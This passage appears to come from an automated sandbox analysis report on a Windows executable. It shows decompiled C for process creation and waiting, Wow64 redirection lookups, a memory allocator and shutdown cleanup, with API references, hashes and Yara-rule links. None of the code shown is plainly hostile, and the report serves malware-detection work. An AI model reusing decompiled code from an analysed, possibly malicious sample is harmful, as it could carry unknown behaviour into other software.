				if(_t23 == 0) {
					E004AF34C(0x83, _t41, 0, _t53, _t58);
				}
				CloseHandle(_v88);
				do {
					E004AF6FC();
				} while (MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0x4ff) == 1);
				E004AF6FC();
				GetExitCodeProcess(_v92, _t51); // executed
				CloseHandle(_v92);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(0x4af806);
				return E00407A20( &_v8);
			}











                                                                    0x004af733
                                                                    0x004af736
                                                                    0x004af738
                                                                    0x004af73a
                                                                    0x004af73e
                                                                    0x004af73f
                                                                    0x004af744
                                                                    0x004af747
                                                                    0x004af74a
                                                                    0x004af74f
                                                                    0x004af750
                                                                    0x004af755
                                                                    0x004af75e
                                                                    0x004af76d
                                                                    0x004af772
                                                                    0x004af798
                                                                    0x004af79d
                                                                    0x004af79f
                                                                    0x004af7a5
                                                                    0x004af7a5
                                                                    0x004af7ae
                                                                    0x004af7b3
                                                                    0x004af7b3
                                                                    0x004af7cc
                                                                    0x004af7d1
                                                                    0x004af7db
                                                                    0x004af7e4
                                                                    0x004af7eb
                                                                    0x004af7ee
                                                                    0x004af7f1
                                                                    0x004af7fe

                                                                    APIs
                                                                    • CreateProcessW.KERNEL32 ref: 004AF798
                                                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                                    • MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                                    • GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                                    • CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                                      • Part of subcall function 004AF34C: GetLastError.KERNEL32(00000000,004AF3F5,?,?,00000000), ref: 004AF36F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                    • String ID: D
                                                                    • API String ID: 3356880605-2746444292
                                                                    • Opcode ID: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                                    • Instruction ID: 88989adc3f1fa39a5a5eb6990527994e2deb527bcdcae90bffb7d35c0d41af56
                                                                    • Opcode Fuzzy Hash: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                                    • Instruction Fuzzy Hash: C01163716041096EEB00FBE68C42F9F77ACDF56714F50053AB604E72C5DA789905866D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004B5A90, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 60%
                                                                    			E004B5A90(void* __ebx, void* __ecx, void* __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _t16;
				intOrPtr _t32;
				intOrPtr _t41;

				_t27 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(_t41);
				_push(0x4b5b5a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				 *0x4c1124 =  *0x4c1124 - 1;
				if( *0x4c1124 < 0) {
					 *0x4c1128 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64DisableWow64FsRedirection");
					 *0x4c112c = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64RevertWow64FsRedirection");
					if( *0x4c1128 == 0 ||  *0x4c112c == 0) {
						_t16 = 0;
					} else {
						_t16 = 1;
					}
					 *0x4c1130 = _t16;
					E00422D44( &_v12);
					E00422660(_v12,  &_v8);
					E004086E4( &_v8, L"shell32.dll");
					E00421230(_v8, _t27, 0x8000); // executed
					E004232EC(0x4c783afb,  &_v16);
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_push(0x4b5b61);
				return E00407A80( &_v16, 3);
			}









                                                                    0x004b5a90
                                                                    0x004b5a93
                                                                    0x004b5a95
                                                                    0x004b5a97
                                                                    0x004b5a9b
                                                                    0x004b5a9c
                                                                    0x004b5aa1
                                                                    0x004b5aa4
                                                                    0x004b5aa7
                                                                    0x004b5aae
                                                                    0x004b5ac9
                                                                    0x004b5ae3
                                                                    0x004b5aef
                                                                    0x004b5afa
                                                                    0x004b5afe
                                                                    0x004b5afe
                                                                    0x004b5afe
                                                                    0x004b5b00
                                                                    0x004b5b08
                                                                    0x004b5b13
                                                                    0x004b5b20
                                                                    0x004b5b2d
                                                                    0x004b5b3a
                                                                    0x004b5b3a
                                                                    0x004b5b41
                                                                    0x004b5b44
                                                                    0x004b5b47
                                                                    0x004b5b59

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5ABE
                                                                      • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5AD8
                                                                      • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00000000), ref: 0040E20B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                    • API String ID: 1646373207-2130885113
                                                                    • Opcode ID: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                                    • Instruction ID: b56c6da1e02aeac4ac36a9fb763b3b3a2bfa4c382daca5c5ea2a5d16c2919690
                                                                    • Opcode Fuzzy Hash: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                                    • Instruction Fuzzy Hash: DA11A730604704AFD744EB76DC02F9DB7B4E749704F64447BF500A6591CABC6A04CA3D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403EE8, Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 68%
                                                                    			E00403EE8(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t96;
				void** _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				void* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t95 = __eax;
				_t129 =  *0x4bb059; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t2 = _t162 + 0x10010; // 0x10110
							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
							_t121 = _t96;
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E00403C48();
								_t99 =  *0x4bdb80; // 0x4bdb7c
								 *_t147 = 0x4bdb7c;
								 *0x4bdb80 = _t121;
								 *(_t147 + 4) = _t99;
								 *_t99 = _t121;
								 *0x4bdb78 = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t67 = _t95 + 0xd3; // 0x1d3
						_t125 = (_t67 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L42;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L42;
							}
						}
						L42:
						_t68 = _t125 - 0xb30; // -2445
						_t141 = _t68;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x4bbaf8 + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x4bbaf4;
							if((0xfffffffe << _t132 &  *0x4bbaf4) == 0) {
								_t133 =  *0x4bbaf0; // 0x0
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E00403BCC(_t125);
								} else {
									_t110 =  *0x4bbaec; // 0x21168a0
									_t109 = _t110 - _t125;
									 *0x4bbaec = _t109;
									 *0x4bbaf0 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x4bbae8 = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L50;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L50:
							_push(_t152);
							_push(_t145);
							_t148 = 0x4bbb78 + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x4bbaf8 + _t142 * 4;
								 *_t80 =  *(0x4bbaf8 + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x4bbaf4], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E00403B00(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							_t93 = _t125 + 2; // 0x1a5
							 *(_t159 - 4) = _t93;
							 *0x4bbae8 = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					_t6 = __edx + 0x4bb990; // 0xc8c8c8c8
					__eax =  *_t6 & 0x000000ff;
					__ebx = 0x4b7080 + ( *_t6 & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [ebx], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 8);
					__eax =  *(__edx + 0x10);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x18);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0x14);
						if(__eax >  *(__ebx + 0x14)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x4bb059;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags == 0) {
										goto L22;
									}
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [0x4bbae8], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
									goto L22;
								}
							}
							L22:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x4bbaf4;
							__eflags =  *(__ebx + 1) &  *0x4bbaf4;
							if(( *(__ebx + 1) &  *0x4bbaf4) == 0) {
								__ecx =  *(__ebx + 4) & 0x0000ffff;
								__edi =  *0x4bbaf0; // 0x0
								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
									__eax =  *(__ebx + 6) & 0x0000ffff;
									__edi = __eax;
									__eax = E00403BCC(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L35;
									} else {
										 *0x4bbae8 = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x4bbaec; // 0x21168a0
									__ecx =  *(__ebx + 6) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x4bbaf0 =  *0x4bbaf0 - __edi;
									 *0x4bbaec = __esi;
									goto L35;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x4bbaf8 + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4;
								__edi = 0x4bbb78 + ( *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x4bbaf8 + __eax * 4;
									 *_t38 =  *(0x4bbaf8 + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x4bbaf4], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 6) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E00403B00(__eax, __ecx, __edx);
								}
								L35:
								_t56 = __edi + 6; // 0x6
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x4bbae8 = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 0x10)) = 0;
								 *((intOrPtr*)(__esi + 0x14)) = 1;
								 *(__ebx + 0x18) = __esi;
								_t61 = __esi + 0x20; // 0x21168c0
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 0x10) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0x14) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0x14;
							 *_t19 =  *(__edx + 0x14) + 1;
							__eflags =  *_t19;
							 *(__ebx + 0x10) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 8);
							 *(__ecx + 0xc) = __ebx;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}






























                                                                    0x00403ee8
                                                                    0x00403ef4
                                                                    0x00403efa
                                                                    0x00404148
                                                                    0x0040414d
                                                                    0x00404260
                                                                    0x00404261
                                                                    0x00404263
                                                                    0x00403c94
                                                                    0x00403c98
                                                                    0x00403c9a
                                                                    0x00403ca4
                                                                    0x00403cb4
                                                                    0x00403cb9
                                                                    0x00403cbd
                                                                    0x00403cbf
                                                                    0x00403cc1
                                                                    0x00403cc7
                                                                    0x00403cca
                                                                    0x00403ccf
                                                                    0x00403cd4
                                                                    0x00403cda
                                                                    0x00403ce0
                                                                    0x00403ce3
                                                                    0x00403ce5
                                                                    0x00403cec
                                                                    0x00403cec
                                                                    0x00403cf5
                                                                    0x00404269
                                                                    0x00404269
                                                                    0x0040426b
                                                                    0x0040426b
                                                                    0x00404153
                                                                    0x00404153
                                                                    0x0040415f
                                                                    0x00404162
                                                                    0x00404164
                                                                    0x0040410c
                                                                    0x00404111
                                                                    0x00404119
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040411b
                                                                    0x0040411d
                                                                    0x00404124
                                                                    0x00000000
                                                                    0x00404126
                                                                    0x00404128
                                                                    0x00404132
                                                                    0x0040413a
                                                                    0x0040413e
                                                                    0x00000000
                                                                    0x0040413e
                                                                    0x0040413a
                                                                    0x00000000
                                                                    0x00404124
                                                                    0x0040410c
                                                                    0x00404166
                                                                    0x00404166
                                                                    0x00404166
                                                                    0x0040416e
                                                                    0x00404171
                                                                    0x0040417b
                                                                    0x0040417b
                                                                    0x00404182
                                                                    0x00404195
                                                                    0x00404199
                                                                    0x0040419f
                                                                    0x004041b8
                                                                    0x004041be
                                                                    0x004041be
                                                                    0x004041c0
                                                                    0x004041de
                                                                    0x004041c2
                                                                    0x004041c2
                                                                    0x004041c7
                                                                    0x004041c9
                                                                    0x004041ce
                                                                    0x004041d7
                                                                    0x004041d7
                                                                    0x004041e3
                                                                    0x004041eb
                                                                    0x004041a1
                                                                    0x004041a1
                                                                    0x004041ab
                                                                    0x004041b3
                                                                    0x00000000
                                                                    0x004041b3
                                                                    0x00404184
                                                                    0x00404187
                                                                    0x0040418a
                                                                    0x004041ec
                                                                    0x004041ec
                                                                    0x004041ed
                                                                    0x004041ee
                                                                    0x004041f5
                                                                    0x004041f8
                                                                    0x004041fb
                                                                    0x004041fe
                                                                    0x00404200
                                                                    0x00404202
                                                                    0x00404209
                                                                    0x0040420b
                                                                    0x0040420b
                                                                    0x0040420b
                                                                    0x00404212
                                                                    0x00404214
                                                                    0x00404214
                                                                    0x00404212
                                                                    0x00404220
                                                                    0x00404225
                                                                    0x00404225
                                                                    0x00404227
                                                                    0x00404248
                                                                    0x00404248
                                                                    0x00404248
                                                                    0x00404229
                                                                    0x00404229
                                                                    0x0040422f
                                                                    0x00404232
                                                                    0x00404236
                                                                    0x0040423c
                                                                    0x0040423e
                                                                    0x0040423e
                                                                    0x0040423c
                                                                    0x0040424d
                                                                    0x00404250
                                                                    0x00404253
                                                                    0x0040425f
                                                                    0x0040425f
                                                                    0x00404182
                                                                    0x00403f00
                                                                    0x00403f00
                                                                    0x00403f02
                                                                    0x00403f02
                                                                    0x00403f09
                                                                    0x00403f10
                                                                    0x00403f68
                                                                    0x00403f68
                                                                    0x00403f6d
                                                                    0x00403f71
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403f73
                                                                    0x00403f73
                                                                    0x00403f76
                                                                    0x00403f7b
                                                                    0x00403f7f
                                                                    0x00403f81
                                                                    0x00403f81
                                                                    0x00403f84
                                                                    0x00403f89
                                                                    0x00403f8d
                                                                    0x00403f8f
                                                                    0x00403f92
                                                                    0x00403f94
                                                                    0x00403f9b
                                                                    0x00000000
                                                                    0x00403f9d
                                                                    0x00403f9f
                                                                    0x00403fa4
                                                                    0x00403fa9
                                                                    0x00403fad
                                                                    0x00403fb5
                                                                    0x00000000
                                                                    0x00403fb5
                                                                    0x00403fad
                                                                    0x00403f9b
                                                                    0x00403f8d
                                                                    0x00000000
                                                                    0x00403f7f
                                                                    0x00403f68
                                                                    0x00403f12
                                                                    0x00403f12
                                                                    0x00403f15
                                                                    0x00403f18
                                                                    0x00403f1d
                                                                    0x00403f1f
                                                                    0x00403f38
                                                                    0x00403f3b
                                                                    0x00403f3f
                                                                    0x00403f41
                                                                    0x00403f44
                                                                    0x00403fbc
                                                                    0x00403fbd
                                                                    0x00403fbe
                                                                    0x00403fc5
                                                                    0x00403fc7
                                                                    0x00403fc7
                                                                    0x00403fcc
                                                                    0x00403fd4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403fd6
                                                                    0x00403fd8
                                                                    0x00403fdf
                                                                    0x00000000
                                                                    0x00403fe1
                                                                    0x00403fe3
                                                                    0x00403fe8
                                                                    0x00403fed
                                                                    0x00403ff5
                                                                    0x00403ff9
                                                                    0x00000000
                                                                    0x00403ff9
                                                                    0x00403ff5
                                                                    0x00000000
                                                                    0x00403fdf
                                                                    0x00403fc7
                                                                    0x00404000
                                                                    0x00404004
                                                                    0x00404004
                                                                    0x0040400a
                                                                    0x0040407c
                                                                    0x00404080
                                                                    0x00404086
                                                                    0x00404088
                                                                    0x004040b0
                                                                    0x004040b4
                                                                    0x004040b6
                                                                    0x004040bb
                                                                    0x004040bd
                                                                    0x004040bf
                                                                    0x00000000
                                                                    0x004040c1
                                                                    0x004040c1
                                                                    0x004040c6
                                                                    0x004040c8
                                                                    0x004040c9
                                                                    0x004040ca
                                                                    0x004040cb
                                                                    0x004040cb
                                                                    0x0040408a
                                                                    0x0040408a
                                                                    0x00404090
                                                                    0x00404094
                                                                    0x0040409a
                                                                    0x0040409c
                                                                    0x0040409e
                                                                    0x0040409e
                                                                    0x004040a0
                                                                    0x004040a2
                                                                    0x004040a8
                                                                    0x00000000
                                                                    0x004040a8
                                                                    0x0040400c
                                                                    0x0040400c
                                                                    0x0040400f
                                                                    0x00404016
                                                                    0x0040401d
                                                                    0x00404020
                                                                    0x00404023
                                                                    0x0040402a
                                                                    0x0040402d
                                                                    0x00404030
                                                                    0x00404033
                                                                    0x00404035
                                                                    0x00404037
                                                                    0x00404039
                                                                    0x0040403e
                                                                    0x00404040
                                                                    0x00404040
                                                                    0x00404040
                                                                    0x00404047
                                                                    0x00404049
                                                                    0x00404049
                                                                    0x00404047
                                                                    0x00404050
                                                                    0x00404055
                                                                    0x00404058
                                                                    0x0040405e
                                                                    0x004040cc
                                                                    0x004040cc
                                                                    0x004040cc
                                                                    0x00404060
                                                                    0x00404060
                                                                    0x00404062
                                                                    0x00404066
                                                                    0x00404068
                                                                    0x0040406b
                                                                    0x0040406e
                                                                    0x00404071
                                                                    0x00404075
                                                                    0x00404075
                                                                    0x004040d1
                                                                    0x004040d1
                                                                    0x004040d1
                                                                    0x004040d4
                                                                    0x004040d7
                                                                    0x004040d9
                                                                    0x004040de
                                                                    0x004040e0
                                                                    0x004040e3
                                                                    0x004040ea
                                                                    0x004040ed
                                                                    0x004040ed
                                                                    0x004040f0
                                                                    0x004040f4
                                                                    0x004040f7
                                                                    0x004040fa
                                                                    0x004040fc
                                                                    0x004040fc
                                                                    0x004040fe
                                                                    0x00404101
                                                                    0x00404104
                                                                    0x00404107
                                                                    0x00404108
                                                                    0x00404109
                                                                    0x0040410a
                                                                    0x0040410a
                                                                    0x00403f46
                                                                    0x00403f46
                                                                    0x00403f46
                                                                    0x00403f46
                                                                    0x00403f4a
                                                                    0x00403f4d
                                                                    0x00403f50
                                                                    0x00403f53
                                                                    0x00403f54
                                                                    0x00403f54
                                                                    0x00403f21
                                                                    0x00403f21
                                                                    0x00403f25
                                                                    0x00403f25
                                                                    0x00403f28
                                                                    0x00403f2b
                                                                    0x00403f2e
                                                                    0x00403f58
                                                                    0x00403f5b
                                                                    0x00403f5e
                                                                    0x00403f61
                                                                    0x00403f64
                                                                    0x00403f65
                                                                    0x00403f30
                                                                    0x00403f30
                                                                    0x00403f33
                                                                    0x00403f34
                                                                    0x00403f34
                                                                    0x00403f2e
                                                                    0x00403f1f

                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403F9F
                                                                    • Sleep.KERNEL32(0000000A,00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FB5
                                                                    • Sleep.KERNEL32(00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FE3
                                                                    • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                                    • Instruction ID: d98b69cfe0522def9def3360e9182a2a8bb24ce33fa39324cc86f3a67812f259
                                                                    • Opcode Fuzzy Hash: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                                    • Instruction Fuzzy Hash: 99C123B2A002018BCB15CF69EC84356BFE4EB89311F1882BFE514AB3D5D7B89941C7D8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00407750, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E00407750() {
				void* _t20;
				void* _t23;
				intOrPtr _t31;
				intOrPtr* _t33;
				void* _t46;
				struct HINSTANCE__* _t49;
				void* _t56;

				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t46);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L8:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L14:
						E004073B0();
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t15 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t15);
								_t31 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t31 + 0x10; // 0x400000
								_t49 =  *_t8;
								_t9 = _t31 + 4; // 0x400000
								if(_t49 !=  *_t9 && _t49 != 0) {
									FreeLibrary(_t49);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
